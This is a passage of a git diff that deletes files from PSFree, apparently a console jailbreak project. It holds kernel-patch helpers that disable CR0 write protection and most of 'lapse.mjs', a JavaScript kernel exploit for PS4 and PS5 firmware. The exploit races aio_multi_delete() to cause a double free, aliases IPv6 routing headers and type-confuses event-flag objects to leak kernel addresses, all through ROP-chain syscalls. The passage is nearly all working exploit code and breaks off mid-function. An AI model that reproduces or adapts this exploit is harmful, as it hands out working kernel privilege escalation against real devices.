-	rm -f $@.$$$$;
-
-include $(src:.c=.d)
diff --git a/psfree/kpatch/script.ld b/psfree/kpatch/script.ld
deleted file mode 100644
index 879b98b..0000000
--- a/psfree/kpatch/script.ld
+++ /dev/null
@@ -1,8 +0,0 @@
-SECTIONS
-{
-  .text : { *(.text.start) *(.text) }
-  .rodata : { *(.rodata) }
-  .data : { *(.data) }
-  .bss : { *(.bss) }
-  /DISCARD/ : { *(.comment* .note*) }
-}
diff --git a/psfree/kpatch/types.h b/psfree/kpatch/types.h
deleted file mode 100644
index bcd075a..0000000
--- a/psfree/kpatch/types.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (C) 2024 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-#pragma once
-
-typedef unsigned char u8;
-typedef unsigned short u16;
-typedef unsigned int u32;
-typedef unsigned long long u64;
-
-typedef signed char s8;
-typedef signed short s16;
-typedef signed int s32;
-typedef signed long long s64;
diff --git a/psfree/kpatch/utils.h b/psfree/kpatch/utils.h
deleted file mode 100644
index 0c06168..0000000
--- a/psfree/kpatch/utils.h
+++ /dev/null
@@ -1,61 +0,0 @@
-/* Copyright (C) 2024 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-#pragma once
-
-#include 
-
-#include "types.h"
-
-inline u64 rdmsr(u32 msr) {
-    u32 low, high;
-
-    asm("rdmsr" : "=a" (low), "=d" (high) : "c" (msr));
-    return (low | ((u64)high << 32));
-}
-
-inline void enable_cr0_wp(void) {
-    asm(
-        "mov rax, cr0\n"
-        "or rax, 0x10000\n"
-        "mov cr0, rax\n"
-    ::: "rax");
-}
-
-inline void disable_cr0_wp(void) {
-    asm(
-        "mov rax, cr0\n"
-        "and rax, ~0x10000\n"
-        "mov cr0, rax\n"
-    ::: "rax");
-}
-
-inline void write8(void *addr, size_t offset, u8 value) {
-    *(u8 *)(addr + offset) = value;
-}
-
-inline void write16(void *addr, size_t offset, u16 value) {
-    *(u16 *)(addr + offset) = value;
-}
-
-inline void write32(void *addr, size_t offset, u32 value) {
-    *(u32 *)(addr + offset) = value;
-}
-
-inline void write64(void *addr, size_t offset, u64 value) {
-    *(u64 *)(addr + offset) = value;
-}
diff --git a/psfree/lapse.mjs b/psfree/lapse.mjs
deleted file mode 100644
index 1197518..0000000
--- a/psfree/lapse.mjs
+++ /dev/null
@@ -1,1844 +0,0 @@
-/* Copyright (C) 2025 anonymous
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// Lapse is a kernel exploit for PS4 [5.00, 12.50) and PS5 [1.00-10.20). It
-// takes advantage of a bug in aio_multi_delete(). Take a look at the comment
-// at the race_one() function here for a brief summary.
-
-// debug comment legend:
-// * PANIC - code will make the system vulnerable to a kernel panic or it will
-//   perform a operation that might panic
-// * RESTORE - code will repair kernel panic vulnerability
-// * MEMLEAK - memory leaks that our code will induce
-
-import { Int } from './module/int64.mjs';
-import { mem } from './module/mem.mjs';
-import { log, die, hex, hexdump } from './module/utils.mjs';
-import { cstr, jstr } from './module/memtools.mjs';
-import { page_size, context_size } from './module/offset.mjs';
-import { Chain } from './module/chain.mjs';
-
-import {
-    View1, View2, View4,
-    Word, Long, Pointer,
-    Buffer,
-} from './module/view.mjs';
-
-import * as rop from './module/chain.mjs';
-import * as config from './config.mjs';
-
-const t1 = performance.now();
-
-// check if we are running on a supported firmware version
-const [is_ps4, version] = (() => {
-    const value = config.target;
-    const is_ps4 = (value & 0x10000) === 0;
-    const version = value & 0xffff;
-    const [lower, upper] = (() => {
-        if (is_ps4) {
-            return [0x100, 0x1250];
-        } else {
-            return [0x100, 0x1020];
-        }
-    })();
-
-    if (!(lower <= version && version < upper)) {
-        throw RangeError(`invalid config.target: ${hex(value)}`);
-    }
-
-    return [is_ps4, version];
-})();
-
-// sys/socket.h
-const AF_UNIX = 1;
-const AF_INET = 2;
-const AF_INET6 = 28;
-const SOCK_STREAM = 1;
-const SOCK_DGRAM = 2;
-const SOL_SOCKET = 0xffff;
-const SO_REUSEADDR = 4;
-const SO_LINGER = 0x80;
-
-// netinet/in.h
-const IPPROTO_TCP = 6;
-const IPPROTO_UDP = 17;
-const IPPROTO_IPV6 = 41;
-
-// netinet/tcp.h
-const TCP_INFO = 0x20;
-const size_tcp_info = 0xec;
-
-// netinet/tcp_fsm.h
-const TCPS_ESTABLISHED = 4;
-
-// netinet6/in6.h
-const IPV6_2292PKTOPTIONS = 25;
-const IPV6_PKTINFO = 46;
-const IPV6_NEXTHOP = 48;
-const IPV6_RTHDR = 51;
-const IPV6_TCLASS = 61;
-
-// sys/cpuset.h
-const CPU_LEVEL_WHICH = 3;
-const CPU_WHICH_TID = 1;
-
-// sys/mman.h
-const MAP_SHARED = 1;
-const MAP_FIXED = 0x10;
-
-// sys/rtprio.h
-const RTP_SET = 1;
-const RTP_PRIO_REALTIME = 2;
-
-// SceAIO has 2 SceFsstAIO workers for each SceAIO Parameter. each Parameter
-// has 3 queue groups: 4 main queues, 4 wait queues, and one unused queue
-// group. queue 0 of each group is currently unused. queue 1 has the lowest
-// priority and queue 3 has the highest
-//
-// the SceFsstAIO workers will process entries at the main queues. they will
-// refill the main queues from the corresponding wait queues each time they
-// dequeue a request (e.g. fill the  low priority main queue from the low
-// priority wait queue)
-//
-// entries on the wait queue will always have a 0 ticket number. they will
-// get assigned a nonzero ticket number once they get put on the main queue
-const AIO_CMD_READ = 1;
-const AIO_CMD_WRITE = 2;
-const AIO_CMD_FLAG_MULTI = 0x1000;
-const AIO_CMD_MULTI_READ = AIO_CMD_FLAG_MULTI | AIO_CMD_READ;
-const AIO_STATE_COMPLETE = 3;
-const AIO_STATE_ABORTED = 4;
-const num_workers = 2;
-// max number of requests that can be created/polled/canceled/deleted/waited
-const max_aio_ids = 0x80;
-
-// highest priority we can achieve given our credentials
-const rtprio = View2.of(RTP_PRIO_REALTIME, 0x100);
-
-// CONFIG CONSTANTS
-const main_core = 7;
-const num_grooms = 0x200;
-const num_handles = 0x100;
-const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
-const num_alias = 10;
-const num_races = 100;
-const leak_len = 16;
-const num_leaks = 5;
-const num_clobbers = 8;
-
-let chain = null;
-var nogc = [];
-
-async function init() {
-    await rop.init();
-    chain = new Chain();
-
-// PS4 9.00
-const pthread_offsets = new Map(Object.entries({
-    'pthread_create' : 0x25510,
-    'pthread_join' : 0xafa0,
-    'pthread_barrier_init' : 0x273d0,
-    'pthread_barrier_wait' : 0xa320,
-    'pthread_barrier_destroy' : 0xfea0,
-    'pthread_exit' : 0x77a0,
-}));
-
-    rop.init_gadget_map(rop.gadgets, pthread_offsets, rop.libkernel_base);
-}
-
-function sys_void(...args) {
-    return chain.syscall_void(...args);
-}
-
-function sysi(...args) {
-    return chain.sysi(...args);
-}
-
-function call_nze(...args) {
-    const res = chain.call_int(...args);
-    if (res !== 0) {
-        die(`call(${args[0]}) returned nonzero: ${res}`);
-    }
-}
-
-// #define SCE_KERNEL_AIO_STATE_NOTIFIED       0x10000
-//
-// #define SCE_KERNEL_AIO_STATE_SUBMITTED      1
-// #define SCE_KERNEL_AIO_STATE_PROCESSING     2
-// #define SCE_KERNEL_AIO_STATE_COMPLETED      3
-// #define SCE_KERNEL_AIO_STATE_ABORTED        4
-//
-// typedef struct SceKernelAioResult {
-//     // errno / SCE error code / number of bytes processed
-//     int64_t returnValue;
-//     // SCE_KERNEL_AIO_STATE_*
-//     uint32_t state;
-// } SceKernelAioResult;
-//
-// typedef struct SceKernelAioRWRequest {
-//     off_t offset;
-//     size_t nbyte;
-//     void *buf;
-//     struct SceKernelAioResult *result;
-//     int fd;
-// } SceKernelAioRWRequest;
-//
-// typedef int SceKernelAioSubmitId;
-//
-// // SceAIO submit commands
-// #define SCE_KERNEL_AIO_CMD_READ     0x001
-// #define SCE_KERNEL_AIO_CMD_WRITE    0x002
-// #define SCE_KERNEL_AIO_CMD_MASK     0xfff
-// // SceAIO submit command flags
-// #define SCE_KERNEL_AIO_CMD_MULTI 0x1000
-//
-// #define SCE_KERNEL_AIO_PRIORITY_LOW     1
-// #define SCE_KERNEL_AIO_PRIORITY_MID     2
-// #define SCE_KERNEL_AIO_PRIORITY_HIGH    3
-//
-// int
-// aio_submit_cmd(
-//     u_int cmd,
-//     SceKernelAioRWRequest reqs[],
-//     u_int num_reqs,
-//     u_int prio,
-//     SceKernelAioSubmitId ids[]
-// );
-function aio_submit_cmd(cmd, requests, num_requests, handles) {
-    sysi('aio_submit_cmd', cmd, requests, num_requests, 3, handles);
-}
-
-// the various SceAIO syscalls that copies out errors/states will not check if
-// the address is NULL and will return EFAULT. this dummy buffer will serve as
-// the default argument so users don't need to specify one
-const _aio_errors = new View4(max_aio_ids);
-const _aio_errors_p = _aio_errors.addr;
-
-// int
-// aio_multi_delete(
-//     SceKernelAioSubmitId ids[],
-//     u_int num_ids,
-//     int sce_errors[]
-// );
-function aio_multi_delete(ids, num_ids, sce_errs=_aio_errors_p) {
-    sysi('aio_multi_delete', ids, num_ids, sce_errs);
-}
-
-// int
-// aio_multi_poll(
-//     SceKernelAioSubmitId ids[],
-//     u_int num_ids,
-//     int states[]
-// );
-function aio_multi_poll(ids, num_ids, sce_errs=_aio_errors_p) {
-    sysi('aio_multi_poll', ids, num_ids, sce_errs);
-}
-
-// int
-// aio_multi_cancel(
-//     SceKernelAioSubmitId ids[],
-//     u_int num_ids,
-//     int states[]
-// );
-function aio_multi_cancel(ids, num_ids, sce_errs=_aio_errors_p) {
-    sysi('aio_multi_cancel', ids, num_ids, sce_errs);
-}
-
-// // wait for all (AND) or atleast one (OR) to finish
-// // DEFAULT is the same as AND
-// #define SCE_KERNEL_AIO_WAIT_DEFAULT 0x00
-// #define SCE_KERNEL_AIO_WAIT_AND     0x01
-// #define SCE_KERNEL_AIO_WAIT_OR      0x02
-//
-// int
-// aio_multi_wait(
-//     SceKernelAioSubmitId ids[],
-//     u_int num_ids,
-//     int states[],
-//     // SCE_KERNEL_AIO_WAIT_*
-//     uint32_t mode,
-//     useconds_t *timeout
-// );
-function aio_multi_wait(ids, num_ids, sce_errs=_aio_errors_p) {
-    sysi('aio_multi_wait', ids, num_ids, sce_errs, 1, 0);
-}
-
-function make_reqs1(num_reqs) {
-    const reqs1 = new Buffer(0x28 * num_reqs);
-    for (let i = 0; i < num_reqs; i++) {
-        // .fd = -1
-        reqs1.write32(0x20 + i*0x28, -1);
-    }
-    return reqs1;
-}
-
-function spray_aio(
-    loops=1, reqs1_p, num_reqs, ids_p, multi=true, cmd=AIO_CMD_READ,
-) {
-    const step = 4 * (multi ? num_reqs : 1);
-    cmd |= multi ? AIO_CMD_FLAG_MULTI : 0;
-    for (let i = 0, idx = 0; i < loops; i++) {
-        aio_submit_cmd(cmd, reqs1_p, num_reqs, ids_p.add(idx));
-        idx += step;
-    }
-}
-
-function poll_aio(ids, states, num_ids=ids.length) {
-    if (states !== undefined) {
-        states = states.addr;
-    }
-    aio_multi_poll(ids.addr, num_ids, states);
-}
-
-function cancel_aios(ids_p, num_ids) {
-    const len = max_aio_ids;
-    const rem = num_ids % len;
-    const num_batches = (num_ids - rem) / len;
-    for (let bi = 0; bi < num_batches; bi++) {
-        aio_multi_cancel(ids_p.add((bi << 2) * len), len);
-    }
-    if (rem) {
-        aio_multi_cancel(ids_p.add((num_batches << 2) * len), rem);
-    }
-}
-
-function free_aios(ids_p, num_ids) {
-    const len = max_aio_ids;
-    const rem = num_ids % len;
-    const num_batches = (num_ids - rem) / len;
-    for (let bi = 0; bi < num_batches; bi++) {
-        const addr = ids_p.add((bi << 2) * len);
-        aio_multi_cancel(addr, len);
-        aio_multi_poll(addr, len);
-        aio_multi_delete(addr, len);
-    }
-    if (rem) {
-        const addr = ids_p.add((num_batches << 2) * len);
-        aio_multi_cancel(addr, len);
-        aio_multi_poll(addr, len);
-        aio_multi_delete(addr, len);
-    }
-}
-
-function free_aios2(ids_p, num_ids) {
-    const len = max_aio_ids;
-    const rem = num_ids % len;
-    const num_batches = (num_ids - rem) / len;
-    for (let bi = 0; bi < num_batches; bi++) {
-        const addr = ids_p.add((bi << 2) * len);
-        aio_multi_poll(addr, len);
-        aio_multi_delete(addr, len);
-    }
-    if (rem) {
-        const addr = ids_p.add((num_batches << 2) * len);
-        aio_multi_poll(addr, len);
-        aio_multi_delete(addr, len);
-    }
-}
-
-function get_our_affinity(mask) {
-    sysi(
-        'cpuset_getaffinity',
-        CPU_LEVEL_WHICH,
-        CPU_WHICH_TID,
-        -1,
-        8,
-        mask.addr,
-    );
-}
-
-function set_our_affinity(mask) {
-    sysi(
-        'cpuset_setaffinity',
-        CPU_LEVEL_WHICH,
-        CPU_WHICH_TID,
-        -1,
-        8,
-        mask.addr,
-    );
-}
-
-function close(fd) {
-    sysi('close', fd);
-}
-
-function new_socket() {
-    return sysi('socket', AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
-}
-
-function new_tcp_socket() {
-    return sysi('socket', AF_INET, SOCK_STREAM, 0);
-}
-
-function gsockopt(sd, level, optname, optval, optlen) {
-    const size = new Word(optval.size);
-    if (optlen !== undefined) {
-        size[0] = optlen;
-    }
-
-    sysi('getsockopt', sd, level, optname, optval.addr, size.addr);
-    return size[0];
-}
-
-function setsockopt(sd, level, optname, optval, optlen) {
-    sysi('setsockopt', sd, level, optname, optval, optlen);
-}
-
-function ssockopt(sd, level, optname, optval, optlen) {
-    if (optlen === undefined) {
-        optlen = optval.size;
-    }
-
-    const addr = optval.addr;
-    setsockopt(sd, level, optname, addr, optlen);
-}
-
-function get_rthdr(sd, buf, len) {
-    return gsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
-}
-
-function set_rthdr(sd, buf, len) {
-    ssockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
-}
-
-function free_rthdrs(sds) {
-    for (const sd of sds) {
-        setsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, 0, 0);
-    }
-}
-
-function build_rthdr(buf, size) {
-    const len = ((size >> 3) - 1) & ~1;
-    size = (len + 1) << 3;
-
-    buf[0] = 0;
-    buf[1] = len;
-    buf[2] = 0;
-    buf[3] = len >> 1;
-
-    return size;
-}
-
-function spawn_thread(thread) {
-    const ctx = new Buffer(context_size);
-    const pthread = new Pointer();
-    pthread.ctx = ctx;
-    // pivot the pthread's stack pointer to our stack
-    ctx.write64(0x38, thread.stack_addr);
-    ctx.write64(0x80, thread.get_gadget('ret'));
-
-    call_nze(
-        'pthread_create',
-        pthread.addr,
-        0,
-        chain.get_gadget('setcontext'),
-        ctx.addr,
-    );
-
-    return pthread;
-}
-
-// EXPLOIT STAGES IMPLEMENTATION
-
-// FUNCTIONS FOR STAGE: 0x80 MALLOC ZONE DOUBLE FREE
-
-function make_aliased_rthdrs(sds) {
-    const marker_offset = 4;
-    const size = 0x80;
-    const buf = new Buffer(size);
-    const rsize = build_rthdr(buf, size);
-
-    for (let loop = 0; loop < num_alias; loop++) {
-        for (let i = 0; i < num_sds; i++) {
-            buf.write32(marker_offset, i);
-            set_rthdr(sds[i], buf, rsize);
-        }
-
-        for (let i = 0; i < sds.length; i++) {
-            get_rthdr(sds[i], buf);
-            const marker = buf.read32(marker_offset);
-            if (marker !== i) {
-                log(`aliased rthdrs at attempt: ${loop}`);
-                const pair = [sds[i], sds[marker]];
-                log(`found pair: ${pair}`);
-                sds.splice(marker, 1);
-                sds.splice(i, 1);
-                free_rthdrs(sds);
-                sds.push(new_socket(), new_socket());
-                return pair;
-            }
-        }
-    }
-    die(`failed to make aliased rthdrs. size: ${hex(size)}`);
-}
-
-// summary of the bug at aio_multi_delete():
-//
-// void
-// free_queue_entry(struct aio_entry *reqs2)
-// {
-//     if (reqs2->ar2_spinfo != NULL) {
-//         printf(
-//             "[0]%s() line=%d Warning !! split info is here\n",
-//             __func__,
-//             __LINE__
-//         );
-//     }
-//     if (reqs2->ar2_file != NULL) {
-//         // we can potentially delay .fo_close()
-//         fdrop(reqs2->ar2_file, curthread);
-//         reqs2->ar2_file = NULL;
-//     }
-//     free(reqs2, M_AIO_REQS2);
-// }
-//
-// int
-// _aio_multi_delete(
-//     struct thread *td,
-//     SceKernelAioSubmitId ids[],
-//     u_int num_ids,
-//     int sce_errors[])
-// {
-//     // ...
-//     struct aio_object *obj = id_rlock(id_tbl, id, 0x160, id_entry);
-//     // ...
-//     u_int rem_ids = obj->ao_rem_ids;
-//     if (rem_ids != 1) {
-//         // BUG: wlock not acquired on this path
-//         obj->ao_rem_ids = --rem_ids;
-//         // ...
-//         free_queue_entry(obj->ao_entries[req_idx]);
-//         // the race can crash because of a NULL dereference since this path
-//         // doesn't check if the array slot is NULL so we delay
-//         // free_queue_entry()
-//         obj->ao_entries[req_idx] = NULL;
-//     } else {
-//         // ...
-//     }
-//     // ...
-// }
-function race_one(request_addr, tcp_sd, barrier, racer, sds) {
-    const sce_errs = new View4([-1, -1]);
-    const thr_mask = new Word(1 << main_core);
-
-    const thr = racer;
-    thr.push_syscall(
-        'cpuset_setaffinity',
-        CPU_LEVEL_WHICH,
-        CPU_WHICH_TID,
-        -1,
-        8,
-        thr_mask.addr,
-    );
-    thr.push_syscall('rtprio_thread', RTP_SET, 0, rtprio.addr);
-    thr.push_gadget('pop rax; ret');
-    thr.push_value(1);
-    thr.push_get_retval();
-    thr.push_call('pthread_barrier_wait', barrier.addr);
-    thr.push_syscall(
-        'aio_multi_delete',
-        request_addr,
-        1,
-        sce_errs.addr_at(1),
-    );
-    thr.push_call('pthread_exit', 0);
-
-    const pthr = spawn_thread(thr);
-    const thr_tid = pthr.read32(0);
-
-    // pthread barrier implementation:
-    //
-    // given a barrier that needs N threads for it to be unlocked, a thread
-    // will sleep if it waits on the barrier and N - 1 threads havent't arrived
-    // before
-    //
-    // if there were already N - 1 threads then that thread (last waiter) won't
-    // sleep and it will send out a wake-up call to the waiting threads
-    //
-    // since the ps4's cores only have 1 hardware thread each, we can pin 2
-    // threads on the same core and control the interleaving of their
-    // executions via controlled context switches
-
-    // wait for the worker to enter the barrier and sleep
-    while (thr.retval_int === 0) {
-        sys_void('sched_yield');
-    }
-
-    // enter the barrier as the last waiter
-    chain.push_call('pthread_barrier_wait', barrier.addr);
-    // yield and hope the scheduler runs the worker next. the worker will then
-    // sleep at soclose() and hopefully we run next
-    chain.push_syscall('sched_yield');
-    // if we get here and the worker hasn't been reran then we can delay the
-    // worker's execution of soclose() indefinitely
-    chain.push_syscall('thr_suspend_ucontext', thr_tid);
-    chain.push_get_retval();
-    chain.push_get_errno();
-    chain.push_end();
-    chain.run();
-    chain.reset();
-
-    const main_res = chain.retval_int;
-    log(`suspend ${thr_tid}: ${main_res} errno: ${chain.errno}`);
-
-    if (main_res === -1) {
-        call_nze('pthread_join', pthr, 0);
-        log();
-        return null;
-    }
-
-    let won_race = false;
-    try {
-        const poll_err = new View4(1);
-        aio_multi_poll(request_addr, 1, poll_err.addr);
-        log(`poll: ${hex(poll_err[0])}`);
-
-        const info_buf = new View1(size_tcp_info);
-        const info_size = gsockopt(tcp_sd, IPPROTO_TCP, TCP_INFO, info_buf);
-        log(`info size: ${hex(info_size)}`);
-
-        if (info_size !== size_tcp_info) {
-            die(`info size isn't ${size_tcp_info}: ${info_size}`);
-        }
-
-        const tcp_state = info_buf[0];
-        log(`tcp_state: ${tcp_state}`);
-
-        const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
-        if (poll_err[0] !== SCE_KERNEL_ERROR_ESRCH
-            && tcp_state !== TCPS_ESTABLISHED
-        ) {
-            // PANIC: double free on the 0x80 malloc zone. important kernel
-            // data may alias
-            aio_multi_delete(request_addr, 1, sce_errs.addr);
-            won_race = true;
-        }
-    } finally {
-        log('resume thread\n');
-        sysi('thr_resume_ucontext', thr_tid);
-        call_nze('pthread_join', pthr, 0);
-    }
-
-    if (won_race) {
-        log(`race errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
-        // if the code has no bugs then this isn't possible but we keep the
-        // check for easier debugging
-        if (sce_errs[0] !== sce_errs[1]) {
-            log('ERROR: bad won_race');
-            die('ERROR: bad won_race');
-        }
-        // RESTORE: double freed memory has been reclaimed with harmless data
-        // PANIC: 0x80 malloc zone pointers aliased
-        return make_aliased_rthdrs(sds);
-    }
-
-    return null;
-}
-
-function double_free_reqs2(sds) {
-    function swap_bytes(x, byte_length) {
-        let res = 0;
-        for (let i = 0; i < byte_length; i++) {
-            res |= ((x >> 8 * i) & 0xff) << 8 * (byte_length - i - 1);
-        }
-
-        return res >>> 0;
-    }
-
-    function htons(x) {
-        return swap_bytes(x, 2);
-    }
-
-    function htonl(x) {
-        return swap_bytes(x, 4);
-    }
-
-    const server_addr = new Buffer(16);
-    // sockaddr_in.sin_family
-    server_addr[1] = AF_INET;
-    // sockaddr_in.sin_port
-    server_addr.write16(2, htons(5050));
-    // sockaddr_in.sin_addr = 127.0.0.1
-    server_addr.write32(4, htonl(0x7f000001));
-
-    const racer = new Chain();
-    const barrier = new Long();
-    call_nze('pthread_barrier_init', barrier.addr, 0, 2);
-
-    const num_reqs = 3;
-    const which_req = num_reqs - 1;
-    const reqs1 = make_reqs1(num_reqs);
-    const reqs1_p = reqs1.addr;
-    const aio_ids = new View4(num_reqs);
-    const aio_ids_p = aio_ids.addr;
-    const req_addr = aio_ids.addr_at(which_req);
-    const cmd = AIO_CMD_MULTI_READ;
-
-    const sd_listen = new_tcp_socket();
-    ssockopt(sd_listen, SOL_SOCKET, SO_REUSEADDR, new Word(1));
-
-    sysi('bind', sd_listen, server_addr.addr, server_addr.size);
-    sysi('listen', sd_listen, 1);
-
-    for (let i = 0; i < num_races; i++) {
-        const sd_client = new_tcp_socket();
-        sysi('connect', sd_client, server_addr.addr, server_addr.size);
-
-        const sd_conn = sysi('accept', sd_listen, 0, 0);
-        // force soclose() to sleep
-        ssockopt(sd_client, SOL_SOCKET, SO_LINGER, View4.of(1, 1));
-        reqs1.write32(0x20 + which_req*0x28, sd_client);
-
-        aio_submit_cmd(cmd, reqs1_p, num_reqs, aio_ids_p);
-        aio_multi_cancel(aio_ids_p, num_reqs);
-        aio_multi_poll(aio_ids_p, num_reqs);
-
-        // drop the reference so that aio_multi_delete() will trigger _fdrop()
-        close(sd_client);
-
-        const res = race_one(req_addr, sd_conn, barrier, racer, sds);
-        racer.reset();
-
-        // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented
-        // twice. this will leave one request undeleted
-        aio_multi_delete(aio_ids_p, num_reqs);
-        close(sd_conn);
-
-        if (res !== null) {
-            log(`won race at attempt: ${i}`);
-            close(sd_listen);
-            call_nze('pthread_barrier_destroy', barrier.addr);
-            return res;
-        }
-    }
-
-    die('failed aio double free');
-}
-
-// FUNCTIONS FOR STAGE: LEAK 0x100 MALLOC ZONE ADDRESS
-
-function new_evf(flags) {
-    const name = cstr('');
-    // int evf_create(char *name, uint32_t attributes, uint64_t flags)
-    return sysi('evf_create', name.addr, 0, flags);
-}
-
-function set_evf_flags(id, flags) {
-    sysi('evf_clear', id, 0);
-    sysi('evf_set', id, flags);
-}
-
-function free_evf(id) {
-    sysi('evf_delete', id);
-}
-
-function verify_reqs2(buf, offset) {
-    // reqs2.ar2_cmd
-    if (buf.read32(offset) !== AIO_CMD_WRITE) {
-        return false;
-    }
-
-    // heap addresses are prefixed with 0xffff_xxxx
-    // xxxx is randomized on boot
-    //
-    // heap_prefixes is a array of randomized prefix bits from a group of heap
-    // address candidates. if the candidates truly are from the heap, they must
-    // share a common prefix
-    const heap_prefixes = [];
-
-    // check if offsets 0x10 to 0x20 look like a kernel heap address
-    for (let i = 0x10; i <= 0x20; i += 8) {
-        if (buf.read16(offset + i + 6) !== 0xffff) {
-            return false;
-        }
-        heap_prefixes.push(buf.read16(offset + i + 4));
-    }
-
-    // check reqs2.ar2_result.state
-    // state is actually a 32-bit value but the allocated memory was
-    // initialized with zeros. all padding bytes must be 0 then
-    let state = buf.read32(offset + 0x38);
-    if (!(0 < state && state <= 4) || buf.read32(offset + 0x38 + 4) !== 0) {
-        return false;
-    }
-
-    // reqs2.ar2_file must be NULL since we passed a bad file descriptor to
-    // aio_submit_cmd()
-    if (!buf.read64(offset + 0x40).eq(0)) {
-        return false;
-    }
-
-    // check if offsets 0x48 to 0x50 look like a kernel address
-    for (let i = 0x48; i <= 0x50; i += 8) {
-        if (buf.read16(offset + i + 6) === 0xffff) {
-            // don't push kernel ELF addresses
-            if (buf.read16(offset + i + 4) !== 0xffff) {
-                heap_prefixes.push(buf.read16(offset + i + 4));
-            }
-        // offset 0x48 can be NULL
-        } else if (i === 0x50 || !buf.read64(offset + i).eq(0)) {
-            return false;
-        }
-    }
-
-    return heap_prefixes.every((e, i, a) => e === a[0]);
-}
-
-function leak_kernel_addrs(sd_pair) {
-    close(sd_pair[1]);
-    const sd = sd_pair[0];
-    const buf = new Buffer(0x80 * leak_len);
-
-    // type confuse a struct evf with a struct ip6_rthdr. the flags of the evf
-    // must be set to >= 0xf00 in order to fully leak the contents of the rthdr
-    log('confuse evf with rthdr');
-    let evf = null;
-    for (let i = 0; i < num_alias; i++) {
-        const evfs = [];
-        for (let i = 0; i < num_handles; i++) {
-            evfs.push(new_evf(0xf00 | i << 16));
-        }
-
-        get_rthdr(sd, buf, 0x80);
-        // for simplicity, we'll assume i < 2**16
-        const flags32 = buf.read32(0);
-        evf = evfs[flags32 >>> 16];
-
-        set_evf_flags(evf, flags32 | 1);
-        get_rthdr(sd, buf, 0x80);
-
-        if (buf.read32(0) === flags32 | 1) {
-            evfs.splice(flags32 >> 16, 1);
-        } else {
-            evf = null;
-        }
-
-        for (const evf of evfs) {
-            free_evf(evf);
-        }
-
-        if (evf !== null) {
-            log(`confused rthdr and evf at attempt: ${i}`);
-            break;
-        }
-    }
-
-    if (evf === null) {
-        die('failed to confuse evf and rthdr');
-    }
-
-    set_evf_flags(evf, 0xff << 8);
-    get_rthdr(sd, buf, 0x80);
-
-    // fields we use from evf (number before the field is the offset in hex):
-    // struct evf:
-    //     0 u64 flags
-    //     28 struct cv cv
-    //     38 TAILQ_HEAD(struct evf_waiter) waiters
-
-    // evf.cv.cv_description = "evf cv"
-    // string is located at the kernel's mapped ELF file
-    const kernel_addr = buf.read64(0x28);
-    log(`"evf cv" string addr: ${kernel_addr}`);
-    // because of TAILQ_INIT(), we have:
-    //
-    // evf.waiters.tqh_last == &evf.waiters.tqh_first
-    //
-    // we now know the address of the kernel buffer we are leaking
-    const kbuf_addr = buf.read64(0x40).sub(0x38);
-    log(`kernel buffer addr: ${kbuf_addr}`);
-
-    // 0x80 < num_elems * sizeof(SceKernelAioRWRequest) <= 0x100
-    // allocate reqs1 arrays at 0x100 malloc zone
-    const num_elems = 6;
-    // use reqs1 to fake a aio_info. set .ai_cred (offset 0x10) to offset 4 of
-    // the reqs2 so crfree(ai_cred) will harmlessly decrement the .ar2_ticket
-    // field
-    const ucred = kbuf_addr.add(4);
-
-    const leak_reqs = make_reqs1(num_elems);
-    const leak_reqs_p = leak_reqs.addr;
-    leak_reqs.write64(0x10, ucred);
-
-    const leak_ids_len = num_handles * num_elems;
-    const leak_ids = new View4(leak_ids_len);
-    const leak_ids_p = leak_ids.addr;
-
-    log('find aio_entry');
-    let reqs2_off = null;
-    loop: for (let i = 0; i < num_leaks; i++) {
-        get_rthdr(sd, buf);
-
-        spray_aio(
-            num_handles,
-            leak_reqs_p,
-            num_elems,
-            leak_ids_p,
-            true,
-            AIO_CMD_WRITE,
-        );
-
-        get_rthdr(sd, buf);
-        for (let off = 0x80; off < buf.length; off += 0x80) {
-            if (verify_reqs2(buf, off)) {
-                reqs2_off = off;
-                log(`found reqs2 at attempt: ${i}`);
-                break loop;
-            }
-        }
-
-        free_aios(leak_ids_p, leak_ids_len);
-    }
-    if (reqs2_off === null) {
-        die('could not leak a reqs2');
-    }
-    log(`reqs2 offset: ${hex(reqs2_off)}`);
-
-    get_rthdr(sd, buf);
-    const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
-    log('leaked aio_entry:');
-    hexdump(reqs2);
-
-    const reqs1_addr = new Long(reqs2.read64(0x10));
-    log(`reqs1_addr: ${reqs1_addr}`);
-    reqs1_addr.lo &= -0x100;
-    log(`reqs1_addr: ${reqs1_addr}`);
-
-    log('searching target_id');
-    let target_id = null;
-    let to_cancel_p = null;
-    let to_cancel_len = null;
-    for (let i = 0; i < leak_ids_len; i += num_elems) {
-        aio_multi_cancel(leak_ids_p.add(i << 2), num_elems);
-
